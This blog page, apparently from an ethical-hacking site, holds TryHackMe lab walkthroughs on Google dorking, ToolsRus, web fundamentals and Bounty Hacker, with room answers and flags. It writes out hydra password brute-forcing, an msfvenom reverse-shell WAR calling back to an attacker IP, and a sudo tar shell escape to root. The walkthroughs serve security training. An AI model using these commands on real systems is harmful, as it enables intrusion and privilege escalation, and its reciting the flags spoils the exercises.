-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • TryHackMe Google Dorking Walkthrough







    Google is a very powerful search engine. Use this room to learn how to harness the power of google. TryHackMe Google Dorking Walkthrough


    [Task 1] Ye Ol' Search Engine



    Google is arguably the most famous example of “Search Engines”, I mean who remembers Ask Jeeves? shudders


    Now it might be rather patronising explaining how these “Search Engines” work, but there’s a lot more going on behind the scenes then what we see. More importantly, we can leverage this to our advantage to find all sorts of things that a wordlist wouldn’t. Researching as a whole - especially in the context of Cybersecurity encapsulates almost everything you do as a pentester. MuirlandOracle has created a fantastic room on learning the attitudes towards how to research, and what information you can gain from it exactly.


    "Search Engines" such as Google are huge indexers – specifically, indexers of content spread across the World Wide Web.


    These essentials in surfing the internet use “Crawlers” or “Spiders” to search for this content across the World Wide Web, which I will discuss in the next task.



    [Task 2] Let's Learn About Crawlers


    What are Crawlers and how do They Work?


    These crawlers discover content through various means. One being by pure discovery, where a URL is visited by the crawler and information regarding the content type of the website is returned to the search engine. In fact, there are lots of information modern crawlers scrape – but we will discuss how this is used later. Another method crawlers use to discover content is by following any and all URLs found from previously crawled websites. Much like a virus in the sense that it will want to traverse/spread to everything it can.


    Let's Visualise Some Things...


    The diagram below is a high-level abstraction of how these web crawlers work. Once a web crawler discovers a domain such as mywebsite.com, it will index the entire contents of the domain, looking for keywords and other miscellaneous information - but I will discuss this miscellaneous information later.


















    In the diagram above, "mywebsite.com" has been scraped as having the keywords as “Apple” “Banana" and “Pear”. These keywords are stored in a dictionary by the crawler, who then returns these to the search engine i.e. Google. Because of this persistence, Google now knows that the domain “mywebsite.com” has the keywords “Apple", “Banana” and “Pear”. As only one website has been crawled, if a user was to search for “Apple”...“mywebsite.com” would appear. This would result in the same behaviour if the user was to search for “Banana”. As the indexed contents from the crawler report the domain as having “Banana”, it will be displayed to the user.











    As illustrated below, a user submits a query to the search engine of “Pears".
    Because the search engine only has the contents of one website that has been crawled with the keyword of “Pears” it will be the only domain that is presented to the user.




    However, as we previously mentioned, crawlers attempt to traverse, termed as crawling, every URL and file that they can find! Say if “mywebsite.com” had the same keywords as before (“Apple", “Banana” and “Pear”), but also had a URL to another website “anotherwebsite.com”, the crawler will then attempt to traverse everything on that URL (anotherwebsite.com) and retrieve the contents of everything within that domain respectively.



    This is illustrated in the diagram below. The crawler initially finds “mywebsite.com”, where it crawls the contents of the website - finding the same keywords (“Apple", “Banana” and “Pear”) as before, but it has additionally found an external URL. Once the crawler is complete on “mywebsite.com”, it'll proceed to crawl the contents of the website “anotherwebsite.com”, where the keywords ("Tomatoes", “Strawberries” and “Pineapples”) are found on it. The crawler's dictionary now contains the contents of both “mywebsite.com” and “anotherwebsite.com”, which is then stored and saved within the search engine.














    Recapping


    So to recap, the search engine now has knowledge of two domains that have been crawled:


    1. mywebsite.com
    2. anotherwebsite.com



    Although note that “anotherwebsite.com” was only crawled because it was referenced by the first domain “mywebsite.com”. Because of this reference, the search engine knows the following about the two domains:



    • Domain Name           Keyword
    • mywebsite.com          Apples
    • mywebsite.com        Bananas
    • mywebsite.com        Pears
    • anotherwebsite.com    Tomatoes
    • anotherwebsite.com    Strawberries
    • anotherwebsite.com    Pineapples



    Or as illustrated below:










    Now that the search engine has some knowledge about keywords, say if a user was to search for “Pears” the domain “mywebsite.com” will be displayed - as it is the only crawled domain containing "Pears":











    Likewise, say in this case the user now searches for "Strawberries". The domain "anotherwebsite.com" will be displayed, as it is the only domain that has been crawled by the search engine that contains the keyword "Strawberries":









    This is great...But imagine if a website had multiple external URL's (as they often do!) That'll require a lot of crawling to take place. There's always the chance that another website might have similar information as of that another website crawled - right? So how does the "Search Engine" decide on the hierarchy of the domains that are displayed to the user?






    In the diagram below in this instance, if the user was to search for a keyword such as "Tomatoes" (which websites 1-3 contain) who decides what website gets displayed in what order?








    A logical presumption would be that website 1 -> 3 would be displayed...But that's not how real-world domains work and/or are named.


    So, who (or what) decides the hierarchy? Well...



    #1 Name the key term of what a "Crawler" is used to do








    Ans :- Index

     


    #2 What is the name of the technique that "Search Engines" use to retrieve this information about websites?



    Ans :- Crawling



    #3 What is an example of the type of contents that could be gathered from a website?


    Ans :- Keywords




    [Task 3] Enter: Search Engine Optimisation




    Search Engine Optimisation


    Search Engine Optimisation or SEO is a prevalent and lucrative topic in modern-day search engines. In fact, so much so, that entire businesses capitalise on improving a domains SEO “ranking”. At an abstract view, search engines will “prioritise” those domains that are easier to index. There are many factors in how “optimal” a domain is - resulting in something similar to a point-scoring system.


    To highlight a few influences on how these points are scored, factors such as:


    • How responsive your website is to the different browser types I.e. Google Chrome, Firefox and Internet Explorer - this includes Mobile phones!


    • How easy it is to crawl your website (or if crawling is even allowed ...but we'll come to this later) through the use of "Sitemaps"


    • What kind of keywords your website has (i.e. In our examples, if the user was to search for a query like “Colours” no domain will be returned - as the search engine has not (yet) crawled a domain that has any keywords to do with “Colours”


    There is a lot of complexity in how the various search engines individually "point-score" or rank these domains - including vast algorithms. Naturally, the companies running these search engines such as Google don't share exactly how the hierarchic view of domains ultimately ends up. Although, as these are businesses at the end of the day, you can pay to advertise/boost the order of which your domain is displayed.



    - Find a good example of how websites pay to boost their domains in the search listings -



    There are various online tools - sometimes provided by the search engine providers themselves that will show you just how optimised your domain is. For example, let's use SEO Site Checkup to check the rating of TryHackMe:


    According to this tool, TryHackMe is rated as 62/100 (as of 31/03/2020). That's not too bad and it'll show the justifications as to how this score was calculated below on the page.


    But...Who or What Regulates these "Crawlers"?



    Aside from the search engines who provide these "Crawlers", website/web-server owners themselves ultimately stipulate what content "Crawlers" can scrape. Search engines will want to retrieve everything from a website - but there are a few cases where we wouldn't want all of the contents of our website to be indexed! Can you think of any...? How about a secret administrator login page? We don't want everyone to be able to find that directory - especially through a google search.




    Introducing Robots.txt...



     
    #1 Using the SEO Site Checkup tool on "tryhackme.com", does TryHackMe pass the “Meta Title Test”? (Yea / Nay)


    Ans :- Yea
     


    #2 Does "tryhackme.com" pass the “Keywords Usage Test?” (Yea / Nay)



    Ans :- Nay

     


    #3 Use https://neilpatel.com/seo-analyzer/ to analyse http://googledorking.cmnatic.co.uk:

    What "Page Score" does the Domain receive out of 100?





    Ans :-  85/100


    #4 With the same tool and domain in Question #3 (previous):

    How many pages use “flash”



    Ans :-  0


     

    #5 From a "rating score" perspective alone, what website would list first?

    tryhackme.com or googledorking.cmnatic.co.uk

    Use tryhackme.com's score of 62/100 as of 31/03/2020 for this question.



    Ans :- googledorking.cmnatic.co.uk



    [Task 4] Beepboop - Robots.txt



    Robots.txt



    Similar to "Sitemaps" which we will later discuss, this file is the first thing indexed by "Crawlers" when visiting a website.


    But what is it?



    This file must be served at the root directory - specified by the webserver itself. Looking at this files extension of .txt, its fairly safe to assume that it is a text file.



    The text file defines the permissions the "Crawler" has to the website. For example, what type of "Crawler" is allowed (I.e. You only want Google's "Crawler" to index your site and not MSN's). Moreover, Robots.txt can specify what files and directories that we do or don't want to be indexed by the "Crawler".

    A very basic markup of a Robots.txt is like the following:









    Here we have a few keywords...


    • Keyword    Function
    • User-agent    Specify the type of "Crawler" that can index your site (the asterisk being a wildcard, allowing all "User-agents"
    • Allow    Specify the directories or file(s) that the "Crawler" can index
    • Disallow    Specify the directories or file(s) that the "Crawler" cannot index
    • Sitemap    Provide a reference to where the sitemap is located (improves SEO as previously discussed, we'll come to sitemaps in the next task)


     
    In this case:


    1. Any "Crawler" can index the site


    2. The "Crawler" is allowed to index the entire contents of the site


    3. The "Sitemap" is located at http://mywebsite.com/sitemap.xml



    Say we wanted to hide directories or files from a "Crawler"? Robots.txt works on a "blacklisting" basis. Essentially, unless told otherwise, the Crawler will index whatever it can find.








    In this case:

    1. Any "Crawler" can index the site



    2. The "Crawler" can index every other content that isn't contained within "/super-secret-directory/".


    Crawlers also know the differences between sub-directories, directories and files. Such as in the case of the second "Disallow:" ("/not-a-secret/but-this-is/")


    The "Crawler" will index all the contents within "/not-a-secret/", but will not index anything contained within the sub-directory "/but-this-is/".


    3. The "Sitemap" is located at http://mywebsite.com/sitemap.xml


    What if we Only Wanted Certain "Crawlers" to Index our Site?


    We can stipulate so, such as in the picture below:




    In this case:



    1. The "Crawler" "Googlebot" is allowed to index the entire site ("Allow: /")

    2. The "Crawler" "msnbot" is not allowed to index the site (Disallow: /")



    How about Preventing Files From Being Indexed?


    Whilst you can make manual entries for every file extension that you don't want to be indexed, you will have to provide the directory it is within, as well as the full filename. Imagine if you had a huge site! What a pain...Here's where we can use a bit of regexing.







    In this case:


    1. Any "Crawler" can index the site


    2. However, the "Crawler" cannot index any file that has the extension of .ini within any directory/sub-directory using ("$") of the site.


    3. The "Sitemap" is located at http://mywebsite.com/sitemap.xml


    Why would you want to hide a .ini file for example? Well, files like this contain sensitive configuration details. Can you think of any other file formats that might contain sensitive information?




    #1 Where would "robots.txt" be located on the domain "ablog.com"


    Ans :-  ablog.com/robots.txt



    #2 If a website was to have a sitemap, where would that be located?


    Ans :-  /sitemap.xml



    #3 How would we only allow "Bingbot" to index the website?


    Ans :- user-agent: Bingbot




    #4  How would we prevent a "Crawler" from indexing the directory "/dont-index-me/"?
     



    Ans :- Disallow: /dont-index-me/



    #5 What is the extension of a Unix/Linux system configuration file that we might want to hide from "Crawlers"?


    Ans :- .conf





    [Task 5] Sitemaps


    Sitemaps


    Comparable to geographical maps in real life, “Sitemaps” are just that - but for websites!

    “Sitemaps” are indicative resources that are helpful for crawlers, as they specify the necessary routes to find content on the domain. The below illustration is a good example of the structure of a website, and how it may look on a "Sitemap":









    The blue rectangles represent the route to nested-content, similar to a directory I.e. “Products” for a store. Whereas, the green rounded-rectangles represent an actual page. However, this is for illustration purposes only - “Sitemaps” don't look like this in the real world. They look something much more similar to this:









    “Sitemaps” are XML formatted. I won't explain the structure of this file-formatting as the room XXE created by falconfeast does a mighty fine job of this.

    The presence of "Sitemaps" holds a fair amount of weight in influencing the "optimisation" and favorability of a website. As we discussed in the "Search Engine Optimisation" task, these maps make the traversal of content much easier for the crawler!


    Why are "Sitemaps" so Favourable for Search Engines?


    Search engines are lazy! Well, better yet - search engines have a lot of data to process. The efficiency of how this data is collected is paramount. Resources like "Sitemaps" are extremely helpful for "Crawlers" as the necessary routes to content are already provided! All the crawler has to do is scrape this content - rather than going through the process of manually finding and scraping. Think of it as using a wordlist to find files instead of randomly guessing their names!



    The easier a website is to "Crawl", the more optimised it is for the "Search Engine"




    #1 What is the typical file structure of a "Sitemap"?


    Ans :- XML



    #2 What real life example can "Sitemaps" be compared to?



    Ans :- Map



    #3 Name the keyword for the path taken for content on a website


    Ans :- Route





    [Task 6] What is Google Dorking?






    Using Google for Advanced Searching

    As we have previously discussed, Google has a lot of websites crawled and indexed. Your average Joe uses Google to look up Cat pictures (I'm more of a Dog person myself...). Whilst Google will have many Cat pictures indexed ready to serve to Joe, this is a rather trivial use of the search engine in comparison to what it can be used for.
    For example, we can add operators such as that from programming languages to either increase or decrease our search results - or perform actions such as arithmetic!









    Say if we wanted to narrow down our search query, we can use quotation marks. Google will interpret everything in between these quotation marks as exact and only return the results of the exact phrase provided...Rather useful to filter through the rubbish that we don't need as we have done so below:








    Refining our Queries


    We can use terms such as “site” (such as bbc.co.uk) and a query (such as "gchq news") to search the specified site for the keyword we have provided to filter out content that may be harder to find otherwise. For example, using the “site” and "query" of "bbc" and "gchq", we have modified the order of which Google returns the results.

    In the screenshot below, searching for “gchq news” returns approximately 1,060,000 results from Google. The website that we want is ranked behind GCHQ's actual website:










    But we don't want that...We wanted “bbc.co.uk” first, so let's refine our search using the “site” term. Notice how in the screenshot below, Google returns with much fewer results? Additionally, the page that we didn't want has disappeared, leaving the site that we did actually want!







    Of course, in this case, GCHQ is quite a topic of discussion - so there'll be a load of results regardless.



    So What Makes "Google Dorking" so Appealing?


    First of all - and the important part - it's legal! It's all indexed, publicly available information. However, what you do with this is where the question of legality comes in to play...


    A few common terms we can search and combine include:




    • Term    Action
    • filetype:
    •     Search for a file by its extension (e.g. PDF)
    • cache:    View Google's Cached version of a specified URL
    • intitle:    The specified phrase MUST appear in the title of the page




    For example, let's say we wanted to use Google to search for all PDFs on bbc.co.uk:



    site:bbc.co.uk filetype:pdf



     





    Great, now we've refined our search for Google to query for all publically accessible PDFs on "bbc.co.uk" - You wouldn't have found files like this "Freedom of Information Request Act" file from a wordlist!


    Here we used the extension PDF, but can you think of any other file formats of sensitive nature that may be publically accessible? (Often unintentionally!!) Again, what you do with any results that you find is where the legality comes into play - this is why "Google Dorking" is so great/dangerous.


    Here is simple directory traversal.


    I have blanked out a lot of the below to cover you, me, THM and the owners of the domains:



     





    #1 What would be the format used to query the site bbc.co.uk about flood defences


    Ans :- site: bbc.co.uk flood defences


     

    #2 What term would you use to search by file type?


    Ans :-  filetype


     
    #3 What term can we use to look for login pages?

     

    Ans :-  intitle: login



     

     

    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • TryHackme ToolsRus Walkthrough






    Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine. TryHackme ToolsRus Walkthrough



    This task requires you to use the following tools:


    •     Dirbuster
    •     Hydra
    •     Nmap
    •     Nikto
    •     Metasploit





    1) What directory can you find, that begins with a g?


    gobuster -x .php,.txt,.html dir -u http://10.10.194.132 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt



    Ans :-  Directory :- /guidelines
    Directory :- /protected



    2) Whose name can you find from this directory?



    http://10.10.194.132/guidelines/


    Ans :- username :- bob




    3) What directory has basic authentication?



    Ans :- protected





    4) What is bob's password to the protected part of the website?
    hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
     




    hydra -l bob -P /home/hackerboy/Documents/rockyou.txt 10.10.194.132 http-get "/protected"



    Ans :- password :-bubbles






    5) What other port that serves a webs service is open on the machine?
    nmap -sC -sV -Pn 10.10.194.132




    Answer :- 1234






    6) Going to the service running on that port, what is the name and version of the software?
    Answer format: Full_name_of_service/Version




    nmap -sC -sV -Pn 10.10.194.132




    Answer :- Apache Tomcat/7.0.88





    7) Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
    How many documentation files did Nikto identify?




    ( after login - Bob’s login credential works for us. Let see what is inside the dashboard. )



    Answer :- 5





    8) What is the server version (run the scan against port 80)?
    nmap -sC -sV -Pn 10.10.194.132




    Answer :- Apache/2.4.18





    9) What version of Apache-Coyote is this service using?
    version of Apache-Coyote
     



    Answer :- 1.1




    10) Use Metasploit to exploit the service and get a shell on the system.
    What user did you get a shell as?



    Answer :- root




    11) What text is in the file /root/flag.txt



    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.61.234  LPORT=4444 -f war > shell.war

    then,
    10.8.61.234 :- it's a tunnel IP ( check tunnel IP in terminal "ip addr"

    login and upload a shell in application manager


    nc -lvnp 4444




    whoami

    ls

    cat flag.txt



    Answer :- ff1fc4a81affcc7688cf89ae7dc6e0e1





    Video Tutorial :- Soon...

     

    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)





  • TryHackMe web fundamentals







    [Task 2] How do we load websites?



    Finding the server


    Initially, a DNS request is made. DNS is like a giant phone book that takes a URL (Like https://tryhackme.com/) and turns it into an IP address. This means that people don’t have to remember IP addresses for their favourite websites. TryHackMe web fundamentals

    The IP address uniquely identifies each internet connected device, like a web server or your computer. These are formed of 4 groups of numbers, each 0-255 (x.x.x.x) and called an octet. An example shown below is 100.70.172.11.


    Loading some content


    Once the browser knows the server's IP address, it can ask the server for the web page. This is done with a HTTP GET request. GET is an example of a HTTP verb, which are the different types of request (More on these later). The server will respond to the GET request with the web page content. If the web page is loading extra resources, like JavaScript, images, or CSS files, those will be retrieved in separate GET requests.






    Wireshark showing the HTTP requests that load a website (neverssl.com)




    For most websites now, these requests will use HTTPS. HTTPS is a secure (encrypted) version of HTTP, it works in more or less the same way. This uses TLS 1.3 (normally) encryption in order to communicate without:


       
    • Other parties being able to read the data
    • Other parties being able to modify the data



    Imagine if someone could modify a request to your bank to send money to your friend. That'd be disastrous!





    A web server is software that receives and responds to HTTP(S) requests. Popular examples are Apache, Nginx and Microsoft's IIS. By default, HTTP runs on port 80 and HTTPS runs on port 443. Many CTFs are based around websites, so it's useful to know that if port 80 is open, there's likely a web server listening that you can attack and exploit.


    The actual content of the web page is normally a combination of HTML, CSS and JavaScript. HTML defines the structure of the page, and the content. CSS allows you to change how the page looks and make it look fancy. JavaScript is a programming language that runs in the browser and allows you to make pages interactive or load extra content.




    #1 What request verb is used to retrieve page content?


    Ans :- GET


    #2 What port do web servers normally listen on?


    Ans :- 80


    #3 What's responsible for making websites look fancy?


    Ans :- CSS






    [Task 3] More HTTP - Verbs and request formats


    https://developer.mozilla.org/en-US/docs/Web/HTTP/Status



    Requests


    There are 9 different HTTP "verbs", also known as methods. Each one has a different function. We've mentioned GET requests already, these are used to retrieve content.


    POST requests are used to send data to a web server, like adding a comment or performing a login.


    There are several more verbs, but these aren't as commonly used for most web servers.


    A HTTP request can be broken down into parts. The first line is a verb and a path for the server, such as


    GET /index.html


    The next section is headers, which give the web server more information about your request. Importantly, cookies are sent in the request headers, more on those later.


    Finally, body of the request. For POST requests, this is the content that's sent to the server. For GET requests, a body is allowed but will mostly be ignored by the server.


    Here's an example for a GET request retrieving a simple JS file:


    GET /main.js HTTP/1.1
    Host: 192.168.170.129:8081
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
    Accept: */*
    Referer: http://192.168.170.129:8081/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8



    From the headers, you can tell what I performed the request from (Chrome version 80, from Windows 10). This is useful for forensics and analysing packet captures.


    Responses



    The server should reply with a response. The response follows a similar structure to the request, but the first line describes the status rather than a verb and a path.
    The status will normally be a code, you're probably already familiar with 404: Not found.



    A basic breakdown of the status codes is:

    •     100-199: Information
    •     200-299: Successes (200 OK is the "normal" response for a GET)
    •     300-399: Redirects (the information you want is elsewhere)
    •     400-499: Client errors (You did something wrong, like asking for something that doesn't exist)
    •     500-599: Server errors (The server tried, but something went wrong on their side)



    You can find more information about these here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status


    Response headers can be very important. They can often tell you something about the web server sending them, or give you cookies that may prove useful later on.



    The response will also have a body. For GET requests, this is normally web content or information such as JSON. For POST requests, it may be a status message or similar.


    Here's a response to the GET request shown above:

    • HTTP/1.1 200 OK
    • Accept-Ranges: bytes
    • Content-Length: 28
    • Content-Type: application/javascript; charset=utf-8
    • Last-Modified: Wed, 12 Feb 2020 12:51:44 GMT
    • Date: Thu, 27 Feb 2020 21:47:30 GMT


    • console.log("Hello, World!")




    #1 What verb would be used for a login?

    Ans :-




    #2 What verb would be used to see your bank balance once you're logged in?




    #3 Does the body of a GET request matter? Yea/Nay
    Ans :-



    #4 What's the status code for "I'm a teapot"?

    Ans :-




    #5 What status code will you get if you need to authenticate to access some content, and you're unauthenticated?

    Ans :-




    [Task 4] Cookies, tasty!


    What are cookies?



    Cookies are small bits of data that are stored in your browser. Each browser will store them separately, so cookies in Chrome won't be available in Firefox. They have a huge number of uses, but the most common are either session management or advertising (tracking cookies). Cookies are normally sent with every HTTP request made to a server.

    Why Cookies?



    Because HTTP is stateless (Each request is independent and no state is tracked internally), cookies are used to keep track of this. They allow sites to keep track of data like what items you have in your shopping cart, who you are, what you've done on the website and more.




    Cookies can be broken down into several parts. Cookies have a name, a value, an expiry date and a path. The name identifies the cookie, the value is where data is stored, the expiry date is when the browser will get rid of the cookie automatically and the path determines what requests the cookie will be sent with. Cookies are normally only sent with requests to the site that set them (Weird things happen with advertising/tracking).


    The server is normally what sets cookies, and these come in the response headers ("Set-Cookie"). Alternatively, these can be set from JavaScript inside your browser.


    Using cookies



    When you log in to a web application, normally you are given a Session Token. This allows the web server to identify your requests from someone else's. Stealing someone else's session token can often allow you to impersonate them.

    Manipulating cookies



    Using your browser's developer tools, you can view and modify cookies. In Firefox, you can open the dev tools with F12. In the Storage tab, you can see cookies that the website has set. There's also a "+" button to allow you to create your own cookies which will come in handy in a minute. You can modify all cookies that you can see in this panel, as well as adding more.


    Alternatives - useful to know


    Slowly, for some uses, LocalStorage and SessionStorage are used instead. This has a similar functionality but isn't sent with HTTP requests by default. These are HTML5 features.


    More on cookies

    [Task 5] Mini CTF



    Time to put what you've learnt to use!


    Making HTTP requests

    You can make HTTP requests in many ways, including without browsers! For CTFs, you'll sometimes need to use cURL or a programming language as this allows you to automate repetitive tasks.

    Intro to cURL



    By default, cURL will perform GET requests on whatever URL you supply it, such as:

    curl https://tryhackme.com



    This would retrieve the main page for tryhackme with a GET request. Using command line flags for cURL, we can do a lot more than just GET content. The -X flag allows us to specify the request type, eg -X POST. You can specify the data to POST with --data, which will default to plain text data. It's worth mentioning cURL does not store cookies, and you have to manually specify any cookies and values that you would like to send with your request. If you want to send cookies from cURL, you can look up how to do this.



    Remember, cookies are not shared between different browsers (I'm counting cURL as a browser here).



    Tasks


    There's a web server running on http://MACHINE_IP:8081. Connect to it and get the flags!
    •     GET request. Make a GET request to the web server with path /ctf/get
    •     POST request. Make a POST request with the body "flag_please" to /ctf/post
    •     Get a cookie. Make a GET request to /ctf/getcookie and check the cookie the server gives you
    •     Set a cookie. Set a cookie with name "flagpls" and value "flagpls" in your devtools and make a GET request to /ctf/sendcookie


    #1 What's the GET flag?


    Ans :- thm{162520bec925bd7979e9ae65a725f99f}



    #2 What's the POST flag?

    Ans :- thm{3517c902e22def9c6e09b99a9040ba09}



    #3 What's the "Get a cookie" flag?

    Ans :- thm{91b1ac2606f36b935f465558213d7ebd}



    #4 What's the "Set a cookie" flag?


    Ans :- thm{c10b5cb7546f359d19c747db2d0f47b3}





    Disclaimer

     


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)





  • TryHackMe Bounty Hacker Walkthrough






    Bounty Hacker


    You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
    TryHackMe Bounty Hacker Walkthrough


    [Task 1] Living up to the title.


    1) Deploy the machine





    2) Find open ports on the machine

    scan IP address



    nmap -A -Pn 10.10.247.118







    3) Who wrote the task list?


    ftp -A 10.10.247.118

    OR


    ftp -p 10.10.247.118


    OR


    ftp 10.10.247.118







    Answer :- lin








    4) What service can you bruteforce with the text file found?



    Answer :- ssh




    5) What is the users password?


    hydra -l lin -P locks.txt 10.10.130.81 ssh


    OR


    hydra -l lin -P locks.txt 10.10.130.81 -t 4 ssh

    OR


    hydra -l lin -P locks.txt 10.10.130.81 -t 4 -e nsr ssh




    Answer :- RedDr4gonSynd1cat3








    6) user.txt



    Login with ssh


    ssh lin@10.10.247.118

    password :- RedDr4gonSynd1cat3


    whoami

    ls

    cd /Desktop

    ls

    cat user.txt

    THM{CR1M3_SyNd1C4T3}


    Ans :- THM{CR1M3_SyNd1C4T3}

      

    7) root.txt


    go to this link https://gtfobins.github.io/


    and  search :-  tar


    and then,


    click on tar option


    and scroll down


    and copy this line


    Sudo


    It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

      
     --> 
      
     sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
     <--

    and paste into ssh bounty hacker account in terminal

    and then, let's access

    # whoami

    root

    # cd /root

    # ls

    root.txt

    # cat root.txt

    THM{80UN7Y_h4cK3r}



    Ans :- THM{80UN7Y_h4cK3r}


     

     

    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)





  • Active Directory Basics TryHackMe Walkthrough






    Active Directory is the directory service for Windows Domain Networks. It is used by many of today's top companies and is a vital skill to comprehend when attacking Windows.


    It is recommended to have knowledge of basic network services, Windows, networking, and Powershell.


    The detail of specific uses and objects will be limited as this is only a general overview of Active Directory. For more information on a specific topic look for the corresponding room or do your own research on the topic. Active Directory Basics TryHackMe Walkthrough
     




    What is Active Directory? -



    Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network. Active Directory contains many functioning bits and pieces, a majority of which we will be covering in the upcoming tasks. To outline what we'll be covering take a look over this list of Active Directory components and become familiar with the various pieces of Active Directory:



    •     Domain Controllers
    •     Forests, Trees, Domains
    •     Users + Groups
    •     Trusts
    •     Policies
    •     Domain Services


    All of these parts of Active Directory come together to make a big network of machines and servers. Now that we know what Active Directory is let's talk about the why?


    Why use Active Directory? -



